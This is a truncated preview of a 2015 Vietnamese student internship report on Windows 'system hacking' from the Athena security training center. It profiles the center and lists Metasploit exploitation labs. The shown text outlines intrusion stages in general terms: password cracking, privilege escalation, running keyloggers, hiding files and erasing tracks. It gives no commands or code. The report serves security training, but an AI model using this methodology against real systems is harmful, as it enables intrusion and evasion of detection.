Tải bản đầy đủ (.pdf) (50 trang)

Nghiên cứu tấn công lỗi hệ thống – system hacking

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.82 MB, 50 trang )

Thành phố Hồ Chí Minh, tháng 6 năm 2015

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH
MẠNG QUỐC TẾ ATHENA



BÁO CÁO THỰC TẬP
Đề tài : Nghiên cứu tấn công lỗ hổng hệ thống -
System hacking







Người HD: Thầy Võ Đỗ Thắng
SVTH: Trần Đăng Khoa



MỤC LỤC

NHẬN XÉT TỪ PHÍA TRUNG TÂM 1
CHÚ THÍCH CÁC TỪ VIẾT TẮT VÀ THUẬT NGỮ 2
LỜI MỞ ĐẦU 3
CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ
AN NINH MẠNG QUỐC TẾ ATHENA 5
1.Tổng quan về trung tâm: 5
2.Lĩnh vực hoạt động chính: 5


3.Quá trình hình thành và phát triển: 6
3.1. Quá trình hình thành: 6
3.2. Quá trình phát triển: 6
4.Cơ cấu tổ chức: 7
Hình 1: cơ cấu tổ chức hành chánh của trung tâm 7
5.Lộ trình đào tạo: 8
Hình 2: Lộ trình đào tạo tại trung tâm 8
6.Chiến lược xúc tiến: 8
Hình 3: Sơ đồ xúc tiến chiến lược phát triển của trung tâm 8
7.Đội ngũ nhân sự: 9
8.Cơ sở vật chất: 9
9.Dịch vụ hổ trợ: 9
10.Thông tin liên hệ: 10
Kết luận chương 1: 10
CHƯƠNG 2: ĐÁNH GIÁ QUÁ TRÌNH THỰC TẬP 11
1.Kết quả đạt được trong quá trình thực tập: 11
2.Thuận lợi khó khăn trong quá trình thực tập: 12
Kết luận chương 2: 12
CHƯƠNG 3: NỘI DUNG NGHIÊN CỨU TRONG QUÁ TRÌNH THỰC TẬP 13
1.Giới thiệu tổng quan về đề tài nghiên cứu: 13
1.1. Tên đề tài nghiên cứu: 13
1.2. Tình hình an ninh mạng hiện nay: 13
1.3. Giới thiệu system hacking: 13
1.4. Quy trình tấn công vào hệ thống: 13
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
2

Hình 4: Các công đoạn tấn công hệ thống 14
1.5. Giới thiệu các lỗ hổng thường xuyên bị tấn công: 15
1.6. Công cụ sử dụng tấn công: 16

1.6.1. Hệ điều hành Backtrack 5 r3: 16
Hình 5: Giao diện sử dụng của backtrack 5 r3 16
1.6.2. Ettercap: 18
1.6.3. Nmap (Network Mapper) và Nessus: 18
1.6.4. Metasploit: 19
1.6.5. Máy chủ ảo (Virtual Private Server - VPS): 19
2.Khai thác xâm nhập hệ thống trong mạng LAN: 20
2.1. Sơ đồ tổng quan hệ thống mạng LAN: 20
Hình 6: Sơ đồ hệ thống mạng LAN 20
2.2. Tiến hành tấn công và khai thác lỗ hổng: 20
2.2.1. Xâm nhập và khai thác lỗ hổng MS10_090: 20
Hình 7: Sơ đồ tấn công ms10_090 21
Hình 8: giao diện khởi động của metasploit 21
Hình 9: đường dẫn module ms10_090 22
Hình 10: sử dụng module ms10_090 22
Hình 11: Xem các thuộc tính của module ms10_090 22
Hình 12: thiết lập các thuộc tính cho module ms10_090 23
Hình 13: đường link dẫn tới máy Attacker 23
Hình 14: máy Victim truy cập vào đường link 23
Hình 15: mở phiên kết nối tới máy Victim 23
Hình 16: truy cập vào phiên vừa mở 24
Hình 17: thông tin máy Victim 24
2.2.2. Xâm nhập và khai thác lỗ hổng MS10_042 có che dấu đánh lừa máy
nạn nhân: 24
Hình 18: Sơ đồ tấn công mã lỗi ms10_042 25
Hình 19: Vào thư mục Ettercap 25
Hình 20: trỏ DNS đến IP Attacker 25
Hình 21: Link URL máy Attacker 26
Hình 22: Màn hình khởi động Ettercap 26
Hình 23: Tìm kiếm các host trong mạng 27

Hình 24: Danh sách host trong mạng 27
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
3

Hình 25: giả mạo địa chỉ Attacker thành địa chỉ router 27
Hình 26: địa chỉ MAC của máy Attacker 28
Hình 27: địa chỉ router sau khi thay đổi 28
Hình 28: mở một phiên điều khiển máy Victim 28
Hình 29: thông tin máy Victim 28
2.2.3. Xâm nhập và khai thác lỗ hổng MS12_027: 29
Hình 30: Sơ đồ tấn công mã lỗi ms12_027 29
Hình 31: đường dẫn đến file bị nhiễm độc 29
Hình 32: Thiết lập handler lắng nghe kết nối từ Victim 30
Hình 33: Victim truy cập file nhiễm độc 30
Hình 34: Mở phiên điều khiển máy Victim 30
Hình 35: thông tin máy Victim 30
2.3. Giải pháp hạn chế tấn công trong mạng LAN: 31
3.Xây dựng hệ thống Honeypot khai thác xâm nhập hệ thống từ xa qua internet: 31
3.1. Giới thiệu về Honeypot: 31
3.2. Sơ đồ tổng quan sử dụng honeypot: 32
Hình 36: Sơ đồ tổng quan tấn công trên Internet 32
3.3. Xâm nhập và khai thác lỗi hổng Adobe reader 9.2 qua internet: 32
3.3.1. Giới thiệu lỗ hổng adobe reader 9.2: 32
3.3.2. Cách thức tấn công và khai thác lỗ hổng: 33
Hình 37: Sơ đồ tấn công lỗ hổng adobe trên internet 33
3.3.3. Quá trình tấn công lỗ hổng adobe reader 9.2: 33
Hình 38: Giao diện khởi động metasploit frameword 33
Hình 39: Tìm kiếm modul lỗi adobe reader 9.2 34
Hình 40: Sử dụng modul adobe tìm được 34
Hình 41: kiểm tra các thuộc tính của modul lỗi 34

Hình 42: Set các giá trị cho modul lỗi 34
Hình 43: Đường dẫn file pdf bị tiêm nhiễm 35
Hình 44: thiết lập giá trị handler lắng nghe kết nối 35
Hình 45: mở phiên kết nối tới máy nạn nhân 35
3.4. Giải pháp hạn chế tấn công qua internet: 35
Kết luận chương 3: 35
KẾT LUẬN 36
PHỤ LỤC 37
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
4

PHỤ LỤC 1: Đăng kí VPS free 37
PHỤ LỤC 2: Cài đặt Metasploit Framework trên VPS 40
PHỤ LỤC 3: Sử dụng Nmap và Nessus 44
DANH MỤC TÀI LIỆU THAM KHẢO 45

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
1

NHẬN XÉT TỪ PHÍA TRUNG TÂM
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….

…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………………………….
…………………………………………………………………………………………
…………………………………………………………………………………………
……………………………………………………………………


Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
2


CHÚ THÍCH CÁC TỪ VIẾT TẮT VÀ THUẬT NGỮ
Hacker Là người lập trình viên giỏi
Attacker Kẻ tấn công
Victim Nạn nhân
CNTT Công nghệ thông tin
CEH Certified Ethical Hacker(chứng chỉ hacker mũ trắng)

SME Small and medium enterprise(doanh nghiệp vừa và nhỏ)
AEH Chứng chỉ hacker mũ trắng Athena
LAN Local Area Network (mạng cục bộ)
VPS Virtual Private Server (máy chủ ảo)
SNMP Simple Network Management Protocol(Tập hợp các giao thức)
HĐH Hệ điều hành
RFID Radio Frequency Identification (Nhận dạng tần số sóng vô tuyến)
ARP Address Resolution Protocol (giao thức phân giải địa chỉ động)
MAC Media Access Control hay Medium Access Control
IP Internet Protocol ( giao thức internet)
MITM Man in the middle
DNS Domain Name System ( phân giải tên miền)
NMAP Network Mapped
CSS Cascading Style Sheet ( ngôn ngữ lập trình web)










Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
3


LỜI MỞ ĐẦU


Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có
2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có
khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên
cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy
đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài
liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng,
các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Theo nhìn nhận của Bkav, đã có
những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản
thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là
nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh
và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng,
đa dạng về hình thức, tinh vi hơn về công nghệ.
Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ
đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số.
Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông
tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến
việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc
phòng, an ninh.
Trong tình hình đó việc đào tạo ra nguồn nhân lực có trình độ cao về công nghệ
thông tin là điều cấp bách và quan trọng hơn hết. Trung tâm đào tạo quản trị mạng và
an ninh mạng là một trong những trung tâm đào tạo sinh viên và cung cấp nguồn nhân
lực để đáp ứng xu thế hiện nay.
Bằng những kiến thức đã được học và quá trình học hỏi tích lũy kiến thức từ các
giảng viên ở trung tâm, tôi đã chọn đề tài : “ Nghiên cứu tấn công lỗi hệ thống –
System hacking” làm báo cáo thực tập doanh nghiêp.
Bài báo cáo này trình bày hai vấn đề chính là:
Phần 1: Trình bày sơ lược về trung tâm đào tạo quản trị mạng và an ninh mạng quốc
tế Athena.
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
4


Phần 2: Giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công
xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ
biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử
dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật
trong thời đại Internet ngày nay.
Nội dung bài viết:
- Lời mở đầu
- Chương 1: Giới thiệu về trung tâm đào tạo quản trị mạng và an ninh mạng quốc
tế Athena
- Chương 2: Đánh giá quá trình thực tập
- Chương 3: Nội dung nghiên cứu trong quá trình thực tập
- Kết luận
Ứng dụng bài viết:
Qua bài báo cáo, người sử dụng hệ thống sẽ có các biện pháp phòng chống các
cuộc tấn công, các doanh nghiệp hoặc nhà quản trị có thể đưa ra các chính sách phòng
chống tấn công cũng như bảo vệ tài nguyên của hệ thống mình.
Với vốn kiến thức còn hạn chế cũng như việc tiếp cận thực tiễn còn nhiều trở
ngại nên bài báo cáo này không tránh khỏi những sai sót, khiếm khuyết. Vì vậy em rất
mong nhận được những góp ý từ phía thầy và các anh chị nhân viên tại trung tâm đào
tạo quản trị mạng và an ninh mạng quốc tế Athena.
Qua đây, em xin gửi lời cảm ơn sâu sắc đến thầy Võ Đỗ Thắng đã truyền dạy cho
em nhiều kiến thức bổ ích, hỗ trợ em tận tình, giúp em có đủ hành trang để hỗ trợ cho
công việc sau này.
Bên cạnh đó, em cũng xin gửi lời cảm ơn đến trung tâm cùng toàn thể các anh
chị nhân viên, giảng viên tại trung tâm Athena đã luôn tận tình chỉ bảo và giúp đỡ em
rất nhiều để em có thể hoàn thành tốt bài báo cáo của mình.

Em xin gửi đến thầy và các anh chị lời chúc sức khỏe và thành đạt!





Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
5


CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
Chương 1 sẽ giới thiệu khái quát về trung tâm và tình hình hoạt động của trung
tâm trong những năm gần đây. Bên cạch đó còn đưa ra những đánh giá hoạt động
chung về trung tâm đào tạo quản trị mạng và an ninh mạng quốc tế Athena.
1. Tổng quan về trung tâm:
ATHENA được thành lập năm 2004, là một tổ chức qui tụ nhiều trí thức Việt
Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực CNTT, với tâm huyết
góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế
mũi nhọn, góp phần phát triển nước nhà .
2. Lĩnh vực hoạt động chính:
 Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo, tư vấn, cung
cấp nhân lực chuyên sâu trong lĩnh vực quản trị mạng, an ninh mạng, thương
mại điện tử, truyền thông xã hội ( social Network) theo các tiêu chuẩn quốc tế
của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH, Song
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An ,
ngân hàng, doanh nghiệp SME, các cơ quan chính phủ, tổ chức tài chính
 Sau hơn 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng, quản lý hệ
thống kinh doanh Online (Internet Business) cho nhiều bộ ngành như Cục Công
Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông
các tỉnh, Sở Thương Mại, doanh nghiệp SME

 Bên cạnh đó, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao
đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí
Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn
Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,
 Song song với các hoạt động đào tạo, Trung tâm ATHENA còn tham gia tư vấn
ứng dụng công nghệ vào nâng cao năng suất lao động và cung cấp nhân sự cho
hàng ngàn doanh nghiệp SME ( khối doanh nghiệp vừa và nhỏ). Hoạt động này
được cộng đồng doanh nghiệp đánh giá rất cao, mang lại lợi ích thiết thực,
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
6

doanh nghiệp vừa được tư vấn công nghệ vừa tìm được nguồn nhân lực phù hợp
cho hoạt động kinh doanh. Đây cũng là cơ sở để các học viên tốt nghiệp
ATHENA luôn có việc làm theo đúng yêu cầu xã hội.
3. Quá trình hình thành và phát triển:
3.1. Quá trình hình thành:
 Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và
thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát
triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá
nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn
xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ
được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm
vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát
triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho
đất nước và xã hội.
 Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính
Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty
EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu
trách nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và
an ninh mạng Athena.
 Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy
tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu
máy tính miền Nam.
3.2. Quá trình phát triển:
 Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng
mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung
tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn
Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống
trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
7

không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này
đến khó khăn khác.
 Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng
góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua
lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm.
Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra
một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một
tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp
trung tâm đứng vững trong thời kì khủng hoảng.
 Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược.
Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại
quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong
những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự
liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi

đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng
bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.
4. Cơ cấu tổ chức:

Hình 1: cơ cấu tổ chức hành chánh của trung tâm





Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
8

5. Lộ trình đào tạo:

Hình 2: Lộ trình đào tạo tại trung tâm
6. Chiến lược xúc tiến:

Hình 3: Sơ đồ xúc tiến chiến lược phát triển của trung tâm
Xác định mục
tiêu
Mục tiêu
truyền thông
Mục tiêu tiêu
thụ
Quyết định
thông điệp

Hình thành
thông điệp

Đánh giá
thông điệp
và lựa chọn
thông điệp
Thực hiện
thông điệp
Đánh giá
quảng cáo.
Tác dụng
truyền thông
Tác dụng đến
mức tiêu thụ
Quyết định
phương tiện
Phạm vi, tần
suất, tác
động
Các kiểu
phương tiện
chính
Quyết định
ngân sách
Căn cứ vào
khả năng Phần
trăm doanh số
bán
Cân bằng cạnh
tranh
Căn cứ mục
tiêu và nhiệm

vụ
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
9

7. Đội ngũ nhân sự:
 Tất cả các giảng viên, chuyên viên trung tâm ATHENA đều là các chuyên gia
trong lĩnh vực quản trị mạng, an ninh mạng, phát triển thương mại điện tử, kinh
doanh trên Internet với nhiều năm kinh nghiệm. Bên cạnh công tác giảng dạy,
các giảng viên thường xuyên tham gia các dự án tư vấn, triển khai công nghệ tại
doanh nghiệp với mục đích đưa kiến thức công nghệ vào phát triển kinh tế và
cập nhật những biến đổi thường xuyên của xã hội để đưa vào chương trình
giảng dạy.
 Phương châm hoạt động của đội ngũ giảng viên ATHENA là "Luôn Luôn Sáng
Tạo Để Đáp Ứng Nhu Cầu Xã Hội".
8. Cơ sở vật chất:
 Thiết bị đầy đủ và hiện đại.
 Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công
nghệ mới nhất.
9. Dịch vụ hổ trợ:
 Đảm bảo việc làm cho học viên tốt nghiệp.
 Giới thiệu việc làm cho mọi học viên.
 Thực tập có lương cho học viên đáp ứng được yêu cầu.
 Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới
hạn thời gian.
 Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,
mạng máy tính, bảo mật mạng, phát triển Internet Business.
 Hỗ trợ thi Chứng chỉ Quốc tế.










Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
10

10. Thông tin liên hệ:
 Địa chỉ:
- 92 Nguyễn Đình Chiểu, phường Đa Kao, Quận1, Tp HCM. (Gần ngã tư
Đinh Tiên Hoàng - Nguyễn Đình Chiểu).
Điện thoại: 094 320 00 88 - 094 323 00 99-(08)38244041-(08)22103801
- Chi nhánh Hà Nội: C2T13, tòa nhà TopCare, 335 Cầu Giấy, Hà Nội.
Điện thoại: (04)38.39.82.14 – 0919119196.
- Website: -
- E-mail : -
- Facebook :
Kết luận chương 1:
Chương 1 đã giới thiệu đôi nét về trung tâm đào tạo quản trị mạng và an ninh
mạng quốc tế Athena. Trình bày được cơ cấu tổ chức, qui trình làm việc cũng như các
hoạt động chính mà trung tâm đang thực hiện. Từ đó có thể đưa ra những đánh giá và
các mặt hạn chế của trung tâm .


















Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
11


CHƯƠNG 2: ĐÁNH GIÁ QUÁ TRÌNH THỰC TẬP
Chương 2 sẽ trình bày những nhận định, đánh giá của bản thân sinh viên về
những gì mình thu thập được, những kinh nghiệm tích lũy trong quá trình làm việc.
1. Kết quả đạt được trong quá trình thực tập:
 Kiến thức :
 Kiến thức về tấn công hệ thống, các lỗ hổng hệ thống, cách khắc phục, cách
sử dụng, quản lý hệ thống VPS, xây dựng web server, đưa ra các giải pháp.
 Kĩ năng :
 Kĩ năng thuyết trình, trình bày báo cáo.
 Kĩ năng giao tiếp, nói chuyện với khách hàng.
 Kĩ năng làm việc nhóm, phối hợp nhóm, phân chia công việc hiệu quả.
 Kĩ năng tìm hiểu tài liệu mới, ứng dụng đề tài nghiên cứu.
 Kinh nghiệm thực tiễn:
 Tiếp cận với môi trường làm việc năng động sáng tạo, không ngừng thay đổi.
 Học hỏi được các kinh nghiệm từ giảng viên và nhân viên làm tại trung tâm.

 Biết được qui trình làm việc, gặp gỡ giao tiếp với các khách hàng, đối tác.
 Hiểu về cách thức quản lý một số hoạt động kinh doanh của trung tâm.
 Kinh nghiệm khi làm việc độc lập, không nên hiểu từ độc lập ở đây là chỉ
làm một mình mà là làm một mình cùng với những người khác, làm một
mình nhưng vẫn theo một cái đã bàn bạc thảo luận trước và mỗi người phải
tự triển khai phần công việc của mình với những người khác cũng triển khai
công việc của họ.
 Kinh nghiệm khi trình bày ý tưởng của mình với các đồng nghiệp mà ở đây
là các bạn trong nhóm trong trung tâm.
 Kinh nghiệm khi tham gia vào các dự án lớn, một dự án lớn sẽ có nhiều
người tham gia và mỗi người một công việc khác nhau, cùng nhau làm việc
theo một sơ đồ khoa học được tổ chức trước.
 Các kinh nghiệm khi xử lý các lỗi phát sinh trong quá trình làm việc là phải
bình tĩnh kiểm tra và vận dụng kiến thức được học để sửa lỗi.


Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
12

2. Thuận lợi khó khăn trong quá trình thực tập:
 Thuận lợi:
 Được sự hướng dẫn tận tình của Thầy và các nhân viên chính thức.
 Được trung tâm tạo điều kiện tốt nhất trong suốt quá trình thực tập.
 Cơ sở vật chất tại trung tâm rất tốt.
 Lịch thực tập rất linh động và có thể thay đổi nếu báo trước.
 Trung tâm hoạt động với nhiều lĩnh vực kinh doanh khác nhau, vốn kinh
nghiệm tích lũy được nhiều.
 Khó khăn:
 Chưa có nhiều kỹ năng mềm, kiến thức chuyên nghành còn hạn hẹp nên gặp
khó khăn trong việc nhận công việc cũng như trình bày ý tưởng của mình.

 Lần đầu tiếp xúc với công nghệ mới, ngôn ngữ mới nên cảm thấy hoang man
và lo lắng về khả năng của bản thân.
 Khi gặp các vấn đề mới, các lỗi phát sinh trong quá trình làm việc thì rất lúng
túng trong việc xử lý và thường là phải nhờ sự giúp đỡ của người hướng dẫn.
Kết luận chương 2:
Chương 2 đã nêu được những thông tin kiến thức mà sinh viên đã tích lũy được,
các kinh nghiệm thực tế từ quá trình thực hiện đề tài cũng như làm việc trong công ty.
Những bài học rút ra được từ các anh chị cũng như giảng viên tại trung tâm. Ngoài ra
cũng nêu ra được những thuận lợi, khó khăn trong quá trình thực tập.












Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
13


CHƯƠNG 3: NỘI DUNG NGHIÊN CỨU TRONG QUÁ TRÌNH THỰC TẬP
Chương 3 sẽ trình bày nội dung mà sinh viên đã nghiên cứu tìm hiểu trong quá
trình thực tập tại trung tâm. Những công nghệ mà sinh viên đã sử dụng, đồng thời
cũng đưa ra những nhận định đánh giá về tính thực tiễn của đề tài.
1. Giới thiệu tổng quan về đề tài nghiên cứu:

1.1. Tên đề tài nghiên cứu:
Tìm hiểu cách thức tấn công hệ thống mạng – system hacking và đưa ra giải
pháp hạn chế tấn công.
1.2. Tình hình an ninh mạng hiện nay:
Trong thời gian qua, tình hình mất an toàn thông tin số diễn biến phức tạp,
xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ
thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.
Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống
công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản,
cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang
gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về
công nghệ.
1.3. Giới thiệu system hacking:
System hacking bao gồm những kỹ thuật lấy username, password dựa vào
phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của
hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy
thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống,
Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô
cùng nghiêm trọng cho các cá nhân, tổ chức.
1.4. Quy trình tấn công vào hệ thống:
Quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ
thuật như Footprinting, Social engineering, Enumeration, Google Hacking…
đã được áp dụng cho mục đích truy tìm thông tin.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
14

Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên
cạnh. Nó gồm 6 công đoạn như sau:


Hình 4: Các công đoạn tấn công hệ thống
 Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong
hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông
tin hữu ích, chính xác hơn.
 Crack: Công đoạn này có lẽ hấp dẫn nhiều Hacker nhất. Bước này yêu
cầu chúng ta bẻ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách
nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống.
 Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ
user bình thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta
tấn công.
 Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị
trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
 Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình…
Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
 Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin
có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu
không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
15


1.5. Giới thiệu các lỗ hổng thường xuyên bị tấn công:
 Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng
mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi
trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng.
Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng
như được tác giả của các đọan mã độc dùng để khởi động chương trình
của họ một cách tự động trên máy tính của bạn.

 Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều
hành, các Web Server hay các phần mềm khác, Và các hãng sản xuất
luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại
các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập
nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không
các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường,
các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và
việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
 Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới
của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa
mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật
và đổi mới hệ điều hành của Microsoft.
 Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để
truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các
chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này,
được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng.
 Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như
HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange
